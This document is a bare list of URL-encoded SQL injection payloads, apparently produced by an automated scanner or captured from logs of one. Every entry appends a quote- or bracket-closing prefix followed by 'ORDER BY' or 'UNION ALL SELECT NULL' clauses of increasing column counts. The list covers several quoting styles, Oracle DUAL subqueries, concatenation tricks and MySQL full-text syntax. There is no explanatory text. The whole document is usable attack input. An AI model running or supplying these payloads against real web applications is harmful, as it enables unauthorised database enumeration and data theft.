1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22Eadw%22%20LIKE%20%22Eadw 1234.5%22%29%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%28%22aKbE%22%20LIKE%20%22aKbE 1234.5%22%29%29%29%20ORDER%20BY%207451--%20%20AND%20%28%28%28%22OCCZ%22%20LIKE%20%22OCCZ 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%28%28%28%22lbDx%22%20LIKE%20%22lbDx 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22IPNS%22%20LIKE%20%22IPNS 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22qhmm%22%20LIKE%20%22qhmm 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22PPjh%22%20LIKE%20%22PPjh 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22bNKE%22%20LIKE%20%22bNKE 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22bYzq%22%20LIKE%20%22bYzq 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22OFFf%22%20LIKE%20%22OFFf 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22aQac%22%20LIKE%20%22aQac 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22wyJV%22%20LIKE%20%22wyJV 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22tAiK%22%20LIKE%20%22tAiK 1234.5%22%20ORDER%20BY%201--%20%20AND%20%22FhlZ%22%20LIKE%20%22FhlZ 1234.5%22%20ORDER%20BY%204157--%20%20AND%20%22hoVu%22%20LIKE%20%22hoVu 1234.5%22%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%22VZHr%22%20LIKE%20%22VZHr 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%22yDga%22%20LIKE%20%22yDga 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22DBTQ%22%20LIKE%20%22DBTQ 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22VxQF%22%20LIKE%20%22VxQF 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22ISDf%22%20LIKE%20%22ISDf 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22WdUm%22%20LIKE%20%22WdUm 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22GDhU%22%20LIKE%20%22GDhU 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22TbeE%22%20LIKE%20%22TbeE 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22cmri%22%20LIKE%20%22cmri 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22YGUd%22%20LIKE%20%22YGUd 1234.5%29%20WHERE%205920%3D5920%20ORDER%20BY%201--%20 1234.5%29%20WHERE%206124%3D6124%20ORDER%20BY%209260--%20 1234.5%29%20WHERE%203909%3D3909%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%29%20WHERE%208647%3D8647%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%206095%3D6095%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%205471%3D5471%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%209438%3D9438%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%204737%3D4737%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%208934%3D8934%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%208421%3D8421%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%204443%3D4443%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%208229%3D8229%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%201043%3D1043%20ORDER%20BY%201--%20 1234.5%27%29%20WHERE%209755%3D9755%20ORDER%20BY%205552--%20 1234.5%27%29%20WHERE%204197%3D4197%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%27%29%20WHERE%209597%3D9597%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%201568%3D1568%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%205871%3D5871%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%208854%3D8854%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%205833%3D5833%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%203787%3D3787%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%208502%3D8502%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%209695%3D9695%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%201858%3D1858%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%201654%3D1654%20ORDER%20BY%201--%20 1234.5%27%20WHERE%201024%3D1024%20ORDER%20BY%205793--%20 1234.5%27%20WHERE%206880%3D6880%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%27%20WHERE%206845%3D6845%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%206121%3D6121%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%207806%3D7806%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%208817%3D8817%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%206730%3D6730%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%203481%3D3481%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%203091%3D3091%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%203215%3D3215%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%207906%3D7906%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%206909%3D6909%20ORDER%20BY%201--%20 1234.5%22%20WHERE%203759%3D3759%20ORDER%20BY%206027--%20 1234.5%22%20WHERE%201499%3D1499%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%22%20WHERE%203724%3D3724%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%204615%3D4615%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%207424%3D7424%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%204930%3D4930%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%206642%3D6642%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%204569%3D4569%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%208018%3D8018%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%203160%3D3160%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%207181%3D7181%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20%7C%7C%20%28SELECT%207614%20FROM%20DUAL%20WHERE%208991%3D8991%20ORDER%20BY%201--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204471%20FROM%20DUAL%20WHERE%209499%3D9499%20ORDER%20BY%201782--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208198%20FROM%20DUAL%20WHERE%206781%3D6781%20UNION%20ALL%20SELECT%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204647%20FROM%20DUAL%20WHERE%202241%3D2241%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202720%20FROM%20DUAL%20WHERE%205614%3D5614%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204248%20FROM%20DUAL%20WHERE%208270%3D8270%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208999%20FROM%20DUAL%20WHERE%202484%3D2484%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201719%20FROM%20DUAL%20WHERE%208039%3D8039%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202338%20FROM%20DUAL%20WHERE%209834%3D9834%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208503%20FROM%20DUAL%20WHERE%208278%3D8278%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204442%20FROM%20DUAL%20WHERE%203242%3D3242%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207110%20FROM%20DUAL%20WHERE%204595%3D4595%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202275%20WHERE%202521%3D2521%20ORDER%20BY%201--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209535%20WHERE%207716%3D7716%20ORDER%20BY%201874--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208277%20WHERE%208095%3D8095%20UNION%20ALL%20SELECT%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204007%20WHERE%206149%3D6149%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203115%20WHERE%205909%3D5909%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205857%20WHERE%201288%3D1288%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205501%20WHERE%208590%3D8590%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201096%20WHERE%201452%3D1452%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201857%20WHERE%207453%3D7453%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202834%20WHERE%206878%3D6878%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205826%20WHERE%209237%3D9237%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203061%20WHERE%207299%3D7299%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%205538%20FROM%20DUAL%20WHERE%203275%3D3275%20ORDER%20BY%201--%20%20%29 1234.5%20%2B%20%28SELECT%209561%20FROM%20DUAL%20WHERE%201595%3D1595%20ORDER%20BY%209211--%20%20%29 1234.5%20%2B%20%28SELECT%203182%20FROM%20DUAL%20WHERE%206864%3D6864%20UNION%20ALL%20SELECT%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%209947%20FROM%20DUAL%20WHERE%205486%3D5486%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%206856%20FROM%20DUAL%20WHERE%203585%3D3585%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%208354%20FROM%20DUAL%20WHERE%208684%3D8684%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%203212%20FROM%20DUAL%20WHERE%202340%3D2340%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%205211%20FROM%20DUAL%20WHERE%206063%3D6063%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%205482%20FROM%20DUAL%20WHERE%206624%3D6624%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%205667%20FROM%20DUAL%20WHERE%209085%3D9085%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%202756%20FROM%20DUAL%20WHERE%201509%3D1509%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%203313%20FROM%20DUAL%20WHERE%202556%3D2556%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%202978%20WHERE%205643%3D5643%20ORDER%20BY%201--%20%20%29 1234.5%20%2B%20%28SELECT%204241%20WHERE%209604%3D9604%20ORDER%20BY%202265--%20%20%29 1234.5%20%2B%20%28SELECT%201264%20WHERE%202183%3D2183%20UNION%20ALL%20SELECT%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%202781%20WHERE%207160%3D7160%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%208582%20WHERE%205399%3D5399%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%202521%20WHERE%206688%3D6688%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%209057%20WHERE%207867%3D7867%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%206783%20WHERE%207953%3D7953%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%202222%20WHERE%209763%3D9763%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%202134%20WHERE%205603%3D5603%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%207773%20WHERE%203344%3D3344%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%204645%20WHERE%201632%3D1632%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%27%20%2B%20%28SELECT%20%27yjtT%27%20FROM%20DUAL%20WHERE%204372%3D4372%20ORDER%20BY%201--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27zfTy%27%20FROM%20DUAL%20WHERE%209535%3D9535%20ORDER%20BY%205675--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27CLoY%27%20FROM%20DUAL%20WHERE%208422%3D8422%20UNION%20ALL%20SELECT%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27yQko%27%20FROM%20DUAL%20WHERE%206147%3D6147%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27ibzi%27%20FROM%20DUAL%20WHERE%204094%3D4094%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27bUIT%27%20FROM%20DUAL%20WHERE%202339%3D2339%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27wzmZ%27%20FROM%20DUAL%20WHERE%205068%3D5068%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27TCFJ%27%20FROM%20DUAL%20WHERE%209486%3D9486%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27UFqZ%27%20FROM%20DUAL%20WHERE%209616%3D9616%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27cwBV%27%20FROM%20DUAL%20WHERE%206994%3D6994%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27oACh%27%20FROM%20DUAL%20WHERE%204098%3D4098%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27BUFN%27%20FROM%20DUAL%20WHERE%206404%3D6404%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27hvNt%27%20WHERE%204184%3D4184%20ORDER%20BY%201--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27XqMq%27%20WHERE%202180%3D2180%20ORDER%20BY%204378--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Elpm%27%20WHERE%203942%3D3942%20UNION%20ALL%20SELECT%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27nVzj%27%20WHERE%208891%3D8891%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Wkjs%27%20WHERE%207956%3D7956%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27LkRJ%27%20WHERE%208621%3D8621%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27HApx%27%20WHERE%204307%3D4307%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27wimP%27%20WHERE%204360%3D4360%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Smkb%27%20WHERE%202944%3D2944%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27VSBI%27%20WHERE%205463%3D5463%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27nmdu%27%20WHERE%208287%3D8287%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27yuqw%27%20WHERE%204412%3D4412%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%201--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%209374--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 -7457%29%20ORDER%20BY%201--%20 -4741%29%20ORDER%20BY%204283--%20 -8610%29%20UNION%20ALL%20SELECT%204934--%20 -7676%29%20UNION%20ALL%20SELECT%203992%2C%203992--%20 -1074%29%20UNION%20ALL%20SELECT%209164%2C%209164%2C%209164--%20 -9216%29%20UNION%20ALL%20SELECT%205359%2C%205359%2C%205359%2C%205359--%20 